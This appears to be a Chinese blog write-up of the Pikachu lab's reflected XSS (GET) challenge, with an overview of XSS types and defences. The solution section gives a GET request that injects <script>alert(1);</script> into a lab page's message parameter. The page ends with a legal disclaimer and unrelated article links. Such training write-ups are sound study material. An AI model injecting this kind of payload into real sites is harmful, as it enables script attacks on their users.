【CTF Web】Pikachu 反射型xss(get) Writeup(反射型XSS+GET请求)

XSS(跨站脚本)概述

Cross-Site Scripting 简称为"CSS",为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:

1.反射性XSS;

2.存储型XSS;

3.DOM型XSS;

XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。

XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。

形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致"精心构造"的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。

因此在XSS漏洞的防范上,一般会采用"对输入进行过滤"和"输出进行转义"的方式进行处理:

输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;

输出转义:根据输出点的位置对输出到前端的内容进行适当转义;

你可以通过"Cross-Site Scripting"对应的测试栏目,来进一步的了解该漏洞。

提示

管tmd什么xss,首先你应该输入kobe看一下再说


解法

随便输入一些数据。

输入 kobe。

审查元素。

html 复制代码
<form method="get">
                    <input class="xssr_in" type="text" maxlength="20" name="message" data-sider-insert-id="8203990d-263f-46f3-bdf4-1b4e6e120c90" data-sider-select-id="8e51dad6-c817-42c0-a848-6261ae2b7ed3">
                    <input class="xssr_submit" type="submit" name="submit" value="submit">
                </form>

发送 GET 请求:

javascript 复制代码
http://172.17.149.214:8765/vul/xss/xss_reflected_get.php?message=<script>alert(1);</script>&submit=submit

出现弹窗。存在反射型 XSS 漏洞。


声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的 。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为 ,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的 。对于因使用这些技术而导致的任何后果,博主不承担任何责任

相关推荐
fei_sun29 分钟前
黑洞路由(Null Route/空接口路由)
服务器·前端·javascript
大爱一家盟41 分钟前
告别卡点BGM同质化 2026原创卡点音乐素材下载网站 TOP5 推荐
大数据·前端·人工智能
彦为君44 分钟前
算法思维与经典智力题
java·前端·redis·算法
云水一下1 小时前
DVWA从入门到精通(四):CSRF(跨站请求伪造)
安全·csrf·dvwa
tuddy7894641 小时前
Codex++ 安全边界探秘:从模型能力到风险防御
人工智能·python·安全
hbugs0011 小时前
【案例分享】全网首个华三数据中心流量可视化实验,基于EVE-NG V7平台
网络·网络协议·安全·devops·eve-ng
深盾科技_Virbox1 小时前
深盾科技·Virbox产品体系全景解读:软件安全如何从加密锁走向全生命周期
java·大数据·算法·安全·软件需求
aa小小1 小时前
localhost 访问异常排查笔记
前端
格子软件1 小时前
2026年GEO优化系统源码的分布式状态机深度拆解
java·前端·vue.js·vue·geo
陈随易2 小时前
Rust、Golang、MoonBit 编译成 WASM,体积和速度差距有多大?
前端·后端·程序员